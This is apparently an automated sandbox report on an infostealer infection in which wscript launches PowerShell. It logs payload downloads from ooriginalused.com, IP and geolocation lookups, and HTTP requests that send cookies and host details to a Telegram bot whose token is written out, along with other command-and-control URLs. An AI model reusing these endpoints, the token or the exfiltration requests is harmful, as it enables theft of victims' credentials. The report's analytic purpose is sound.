              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.8:49696 version: TLS 1.0
              Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.8:49699 version: TLS 1.0
              Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.8:49701 version: TLS 1.0
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficHTTP traffic detected: GET /lord/Reimagine.prm HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: ooriginalused.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /know/HFJSDskkfpVJaPaR167.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: ooriginalused.comCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:305090%0D%0ADate%20and%20Time:%2014/03/2025%20/%2008:42:33%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20305090%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficDNS traffic detected: DNS query: ooriginalused.com
              Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
              Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
              Source: global trafficDNS traffic detected: DNS query: api.telegram.org
              Source: unknownHTTP traffic detected: POST /bot7328026738:AAH1IHU2hS9jcv-fByxTl7eMvqtctOYjBF8/sendDocument?chat_id=1503224244&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0ACookies%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd636367b0dda3Host: api.telegram.orgContent-Length: 742
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Wed, 12 Mar 2025 18:16:41 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
              Source: msiexec.exe, 0000000F.00000002.2230198077.0000000020CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?L
              Source: msiexec.exe, 0000000F.00000002.2230198077.0000000020AD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://aborters.duckdns.org:8081
              Source: msiexec.exe, 0000000F.00000002.2230198077.0000000020AD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anotherarmy.dns.army:8081
              Source: msiexec.exe, 0000000F.00000002.2230198077.0000000020CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
              Source: msiexec.exe, 0000000F.00000002.2232887715.0000000022BFA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://c.pki.goog/r/gsr1.crl0
              Source: msiexec.exe, 0000000F.00000002.2232805320.0000000022BA2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://c.pki.goog/r/r4.crl0
              Source: msiexec.exe, 0000000F.00000002.2232887715.0000000022BFA000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000F.00000002.2230198077.0000000020B8B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://c.pki.goog/we1/K0UVAKe5N94.crl0
              Source: msiexec.exe, 0000000F.00000002.2230198077.0000000020AD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
              Source: msiexec.exe, 0000000F.00000002.2230198077.0000000020AD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
              Source: svchost.exe, 00000008.00000002.2217715412.0000025D1C400000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
              Source: qmgr.db.8.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
              Source: qmgr.db.8.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
              Source: qmgr.db.8.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
              Source: qmgr.db.8.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
              Source: qmgr.db.8.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
              Source: qmgr.db.8.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
              Source: edb.log.8.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
              Source: msiexec.exe, 0000000F.00000002.2232887715.0000000022BFA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://i.pki.goog/gsr1.crt0-
              Source: msiexec.exe, 0000000F.00000002.2232805320.0000000022BA2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://i.pki.goog/r4.crt0
              Source: msiexec.exe, 0000000F.00000002.2232887715.0000000022BFA000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000F.00000002.2230198077.0000000020B8B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://i.pki.goog/we1.crt05
              Source: powershell.exe, 00000003.00000002.1243751229.0000027592CBD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1602163136.0000000005315000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
              Source: msiexec.exe, 0000000F.00000002.2232887715.0000000022BFA000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000F.00000002.2230198077.0000000020B8B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://o.pki.goog/s/we1/8CI0%
              Source: powershell.exe, 00000006.00000002.1581497755.0000000004408000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
              Source: powershell.exe, 00000003.00000002.1221528154.0000027582C51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1581497755.00000000042B1000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000F.00000002.2230198077.0000000020AD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: msiexec.exe, 0000000F.00000002.2230198077.0000000020AD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://varders.kozow.com:8081
              Source: powershell.exe, 00000006.00000002.1581497755.0000000004408000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
              Source: msiexec.exe, 0000000F.00000002.2231687534.0000000021DA9000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000F.00000002.2231687534.0000000021DE3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org?q=
              Source: powershell.exe, 00000003.00000002.1221528154.0000027582C51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
              Source: powershell.exe, 00000006.00000002.1581497755.00000000042B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lBLr
              Source: msiexec.exe, 0000000F.00000002.2230198077.0000000020CBB000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000F.00000002.2230198077.0000000020BC7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
              Source: msiexec.exe, 0000000F.00000002.2230198077.0000000020CBB000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000F.00000002.2230198077.0000000020BC7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
              Source: msiexec.exe, 0000000F.00000002.2230198077.0000000020BC7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
              Source: msiexec.exe, 0000000F.00000002.2230198077.0000000020BC7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:305090%0D%0ADate%20a
              Source: msiexec.exe, 0000000F.00000002.2230198077.0000000020CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7328026738:AAH1IHU2hS9jcv-fByxTl7eMvqtctOYjBF8/sendDocument?chat_id=1503
              Source: msiexec.exe, 0000000F.00000002.2231687534.0000000021DA9000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000F.00000002.2231687534.0000000021DE3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
              Source: msiexec.exe, 0000000F.00000002.2231687534.0000000021DA9000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000F.00000002.2231687534.0000000021DE3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
              Source: msiexec.exe, 0000000F.00000002.2231687534.0000000021DA9000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000F.00000002.2231687534.0000000021DE3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
              Source: msiexec.exe, 0000000F.00000002.2230198077.0000000020C5F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
              Source: msiexec.exe, 0000000F.00000002.2230198077.0000000020C5F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=enT
              Source: msiexec.exe, 0000000F.00000002.2230198077.0000000020C5A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=enlBLr
              Source: powershell.exe, 00000006.00000002.1602163136.0000000005315000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
              Source: powershell.exe, 00000006.00000002.1602163136.0000000005315000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
              Source: powershell.exe, 00000006.00000002.1602163136.0000000005315000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
              Source: msiexec.exe, 0000000F.00000002.2231687534.0000000021DA9000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000F.00000002.2231687534.0000000021DE3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
              Source: msiexec.exe, 0000000F.00000002.2231687534.0000000021DA9000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000F.00000002.2231687534.0000000021DE3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtabv20
              Source: msiexec.exe, 0000000F.00000002.2231687534.0000000021DA9000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000F.00000002.2231687534.0000000021DE3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
              Source: edb.log.8.drString found in binary or memory: https://g.live.com/odclientsettings/Prod/C:
              Source: svchost.exe, 00000008.00000003.1208730043.0000025D1C220000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.8.dr, edb.log.8.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2/C:
              Source: msiexec.exe, 0000000F.00000002.2231687534.0000000021DA9000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000F.00000002.2231687534.0000000021DE3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gemini.google.com/app?q=
              Source: powershell.exe, 00000006.00000002.1581497755.0000000004408000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
              Source: powershell.exe, 00000003.00000002.1243751229.0000027592CBD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1602163136.0000000005315000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
              Source: powershell.exe, 00000003.00000002.1221528154.000002758401C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ooriginalused.c
              Source: powershell.exe, 00000003.00000002.1221528154.000002758401C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ooriginalused.co
              Source: powershell.exe, 00000003.00000002.1221528154.0000027582E77000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1221528154.000002758401C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ooriginalused.com
              Source: powershell.exe, 00000003.00000002.1221528154.000002758401C000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000F.00000002.2215442340.0000000002CF3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ooriginalused.com/
              Source: msiexec.exe, 0000000F.00000002.2229758829.00000000206F0000.00000004.00001000.00020000.00000000.sdmp, msiexec.exe, 0000000F.00000002.2215442340.0000000002CF3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ooriginalused.com/know/HFJSDskkfpVJaPaR167.bin
              Source: msiexec.exe, 0000000F.00000002.2215442340.0000000002CF3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ooriginalused.com/know/HFJSDskkfpVJaPaR167.binM
              Source: powershell.exe, 00000003.00000002.1221528154.000002758401C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ooriginalused.com/l
              Source: powershell.exe, 00000003.00000002.1221528154.000002758401C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ooriginalused.com/lo
              Source: powershell.exe, 00000003.00000002.1221528154.000002758401C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ooriginalused.com/lor
              Source: powershell.exe, 00000003.00000002.1221528154.000002758401C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ooriginalused.com/lord
              Source: powershell.exe, 00000003.00000002.1221528154.000002758401C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ooriginalused.com/lord/
              Source: powershell.exe, 00000003.00000002.1221528154.000002758401C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ooriginalused.com/lord/R
              Source: powershell.exe, 00000003.00000002.1221528154.000002758401C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ooriginalused.com/lord/Re
              Source: powershell.exe, 00000003.00000002.1221528154.000002758401C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ooriginalused.com/lord/Rei
              Source: powershell.exe, 00000003.00000002.1221528154.000002758401C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ooriginalused.com/lord/Reim
              Source: powershell.exe, 00000003.00000002.1221528154.000002758401C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ooriginalused.com/lord/Reima
              Source: powershell.exe, 00000003.00000002.1221528154.000002758401C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ooriginalused.com/lord/Reimag
              Source: powershell.exe, 00000003.00000002.1221528154.000002758401C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ooriginalused.com/lord/Reimagi
              Source: powershell.exe, 00000003.00000002.1221528154.000002758401C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ooriginalused.com/lord/Reimagin
              Source: powershell.exe, 00000003.00000002.1221528154.000002758401C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ooriginalused.com/lord/Reimagine
              Source: powershell.exe, 00000003.00000002.1221528154.000002758401C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ooriginalused.com/lord/Reimagine.
              Source: powershell.exe, 00000003.00000002.1221528154.000002758401C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ooriginalused.com/lord/Reimagine.p
              Source: powershell.exe, 00000003.00000002.1221528154.000002758401C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ooriginalused.com/lord/Reimagine.pr
              Source: powershell.exe, 00000003.00000002.1221528154.000002758401C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ooriginalused.com/lord/Reimagine.prm
              Source: powershell.exe, 00000003.00000002.1221528154.0000027582E77000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ooriginalused.com/lord/Reimagine.prmP
              Source: powershell.exe, 00000006.00000002.1581497755.0000000004408000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ooriginalused.com/lord/Reimagine.prmXR
              Source: msiexec.exe, 0000000F.00000002.2215442340.0000000002CF3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ooriginalused.com/u
              Source: msiexec.exe, 0000000F.00000002.2230198077.0000000020BA2000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000F.00000002.2230198077.0000000020B1B000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000F.00000002.2230198077.0000000020BC7000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000F.00000002.2230198077.0000000020B8B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
              Source: msiexec.exe, 0000000F.00000002.2230198077.0000000020B1B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
              Source: msiexec.exe, 0000000F.00000002.2230198077.0000000020B8B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
              Source: msiexec.exe, 0000000F.00000002.2230198077.0000000020B45000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000F.00000002.2230198077.0000000020BA2000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000F.00000002.2230198077.0000000020BC7000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000F.00000002.2230198077.0000000020B8B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
              Source: msiexec.exe, 0000000F.00000002.2231687534.0000000021DA9000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000F.00000002.2231687534.0000000021DE3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/v20w
              Source: msiexec.exe, 0000000F.00000002.2231687534.0000000021DA9000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000F.00000002.2231687534.0000000021DE3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
              Source: msiexec.exe, 0000000F.00000002.2230198077.0000000020C81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/
              Source: msiexec.exe, 0000000F.00000002.2230198077.0000000020C90000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/T
              Source: msiexec.exe, 0000000F.00000002.2230198077.0000000020C8B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/lBLr
              Source: unknownNetwork traffic detected: HTTP traffic on port 49699 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49682
              Source: unknownNetwork traffic detected: HTTP traffic on port 49697 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49682 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49699
              Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49697
              Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49696
              Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49694 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49694
              Source: unknownNetwork traffic detected: HTTP traffic on port 49696 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701
              Source: unknownHTTPS traffic detected: 185.159.153.17:443 -> 192.168.2.8:49682 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 185.159.153.17:443 -> 192.168.2.8:49694 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:49712 version: TLS 1.2

              System Summary

              barindex
              Malicious sample detected (through community Yara rule)
              Source: amsi32_2032.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: Process Memory Space: powershell.exe PID: 6564, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: Process Memory Space: powershell.exe PID: 2032, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Windows Scripting host queries suspicious COM object (likely to drop second stage)
              Source: C:\Windows\System32\wscript.exeCOM Object queried: WBEM Locator HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}Jump to behavior
              Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Management and Instrumentation HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}Jump to behavior
              Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
              Source: C:\Windows\System32\wscript.exeCOM Object queried: Shell Automation Service HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{13709620-C279-11CE-A49E-444553540000}Jump to behavior
              Writes or reads registry keys via WMI
              Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
              Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
              Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
              Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
              Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
              Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
              Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
              Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
              Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
              Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
              Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
              Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
              Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
              Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
              Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
              Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
              Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
              Wscript starts Powershell (via cmd or directly)
